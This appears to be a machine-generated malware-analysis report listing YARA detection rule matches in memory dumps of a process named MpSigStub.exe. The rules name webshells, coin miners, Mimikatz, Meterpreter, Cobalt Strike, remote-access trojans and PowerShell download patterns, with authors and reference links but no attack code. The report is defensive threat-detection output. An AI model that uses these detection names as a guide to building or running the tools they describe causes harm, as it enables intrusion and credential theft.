Source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18306567757.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411594732.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18317647190.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18316997643.0000015B1B598000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18296064516.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18351179947.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18403089371.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18288987987.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18313512818.0000015B1B346000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18325517837.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18330638755.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18330638755.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18316329497.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18336723789.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18323868678.0000015B1BD96000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18350449076.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18350449076.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18310362275.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18333848371.0000015B1A546000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18411989385.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18318342429.0000015B1C460000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.18326028548.0000015B1ACB0000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18285552638.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18341450740.0000015B1B4D3000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18310667601.0000015B1AD99000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18310667601.0000015B1AD99000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18346153630.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
